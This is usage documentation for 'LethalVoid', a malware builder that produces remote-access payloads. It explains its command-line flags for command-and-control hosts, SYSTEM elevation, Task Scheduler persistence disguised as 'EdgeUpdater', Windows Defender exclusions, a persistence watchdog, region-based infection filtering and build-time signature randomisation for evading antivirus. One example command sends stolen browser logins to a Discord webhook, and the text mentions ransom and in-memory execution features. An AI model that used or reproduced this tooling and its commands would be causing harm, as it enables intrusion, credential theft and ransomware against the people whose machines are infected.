Builder
The LethalVoid builder generates encryption keys for the payloads at build-time, as well as utilizing randomized instruction substitution to generate payloads with unique signatures. Due to this randomized nature, it can occur that Windows Defender flags certain builds as malware, this is very rare and can be bypassed by simply rebuilding the payload.
Commandline formatting on Windows
On Windows (at least for many of the built-in shells), values that contain a dot (such as the output path or host IP's) require their value to always be inside double qoutes so that they are interpreted as a single argument. Example:
-h="127.0.0.1" -o="myprogram.exe"
Format
The LethalVoid builder allows users to create both executables containing the full loader, which grants persistence and privilege elevation, with the payload encrypted inside it.
But it also lets you build executables of just the raw unencrypted payload as an EXE, as well as as a DLL, in which case it will execute from DllMain upon being loaded.
When choosing any of the payload-only formats, it is important to know that some features are not supported.
Payload-only executables do not have (built-in) persistence, as it requires SYSTEM-level access, which they also do not support.
-f --format=<exe/payloadexe/payloaddll> specifies build format (-t/-d/-P/-E not supported in payload-only formats)
Host & Port
-h --host=<ip/domain> specifies host to connect to (";" split list)
-p --port=<port> specifies host port to connect to (";" split list)
To specify the host ips/domains and ports for the executable to attempt connecting to, use the -h/--host and -p/--port flags.
Up to 30 hosts and ports can be specified (see how to specify lists).
Keep in mind that the payload attempts to connect to 1 host at a time, looping over them. So the more hosts specified, the longer it may take for the payload to connect to the server.
The amount of hosts and ports must be the same, as each port corresponds to exactly one host.
Example:
-h="127.0.0.1;30.168.0.198;112.71.31.192" -p="8000;2001;12345"
Persistence, Elevation, Watchdog & Tasks
-S --system makes loader elevate itself to SYSTEM
-P --persistent executable should run on system start
-i --install=<path> specifies install path
-E --exclude executable should add install path to the Windows Defender exclusions
-t --task=<path> specifies name of task used in task scheduler (only used if persistent flag is set)
-r --description=<description> specifies description of task used in task scheduler (only used if persistent flag is set)
-W --watchdog enables a detached thread that will keep enforcing persistence if any of the persistent files are removed
- Before persistence can be established, LethalVoid requires administrative privileges. To make the LethalVoid payload elevate to Administrator, before migrating to a critical process, elevating itself to SYSTEM, use the
-S/--systemflag. - To gain persistence, the loader uses the Windows Task Scheduler, persistence can be enabled with the
-P/--persistentflag. - Persistence also requires a file to be placed on disk, to specify the path of this file use
-i/--install. The default path isC:\ProgramData\Edge\01\wmfs.png. All non-existing directories in this path will be created automatically. - To add the directory where this file was placed to the Windows Defender exclusions, the
-E/--excludeflag can be used. This is convenient in the case that a future Windows version starts flagging the persistent file as malware. With this flag enabled, Defender will simply ignore the file. - The task name and its description can be specified with the
-t/--task(default:EdgeUpdater) and-r/--description(default: empty) flags. - If for whatever reason the file used for persistence is deleted, if enabled, the watchdog thread (created at LethalVoid start) will simply once again write the file to the same location on disk, and again create the task (if necessary). This feature can be enabled with
-W/--watchdog.
Example:
-i="C:\\MyDirectory\\.notsuspicious.jpg" --task="MyTask" --r="This task starts LethalVoid on this infected machine" -S -P -E -W
Startup commands
-s --startup commands to run on startup before creating a connection to server (";" split list)
To specify commands that will be executed upon execution of the LethalVoid payload, use the -s/--startup flag.
These commands will be executed before the payload attempts to connect to any of the servers passed to the host flag flag.
To retrieve the command's output despite this, the exfiltration commands (discordsend and ftpsend) can be used.
Some commands that require a connected LethalVoid server will not work with this flag, such as upload, memexec and ransom (when used with a ransom note and or wallpaper).
Example:
-s="cd %USERPROFILE%;discordsend MYWEBHOOK \"getbrowser all logins\""
Infection filtering by region
-l --langs LANGID's for which LethalVoid will not execute, e.g. en-US (";" split list)
Users can specify certain region format settings on which LethalVoid will not establish persistence or execute any commands (read from GetUserDefaultLangID), it will simply exit upon execution.
This is specified by the -l/--langs flag, LangID values can be found here.
You can specify up to 30 different LangID's, seperated by the ';' character (see Lists).
Example:
-l="en-US;ru-RU;sv-SE;uk-UA;az-Latn-AZ"
Groups
-g --group=<group name> specifies name of group machines infected by this payload belong to
This specifies the "group" variable embedded in the payload, this has no effect other than organizational (the group of each client is visible on the server).
Example:
-g="experimental group"
Output
-o --output=<path> specifies output file
Specifies the name of the file that will be outputted upon completion.
Example:
-o="myprogram.exe"
Flags
In the LethalVoid builder, flags that have some sort of corresponding value, follow the notation:-x=value, this is the same for both the long and the short names of flags.
Lists
For some options in the builder, such as hosts and langs, you can specify single items as well as lists of items.
To do this, make sure the value is placed between quotes, and each element is seperated by a ';' character. For example: -x="value1;value2;value3"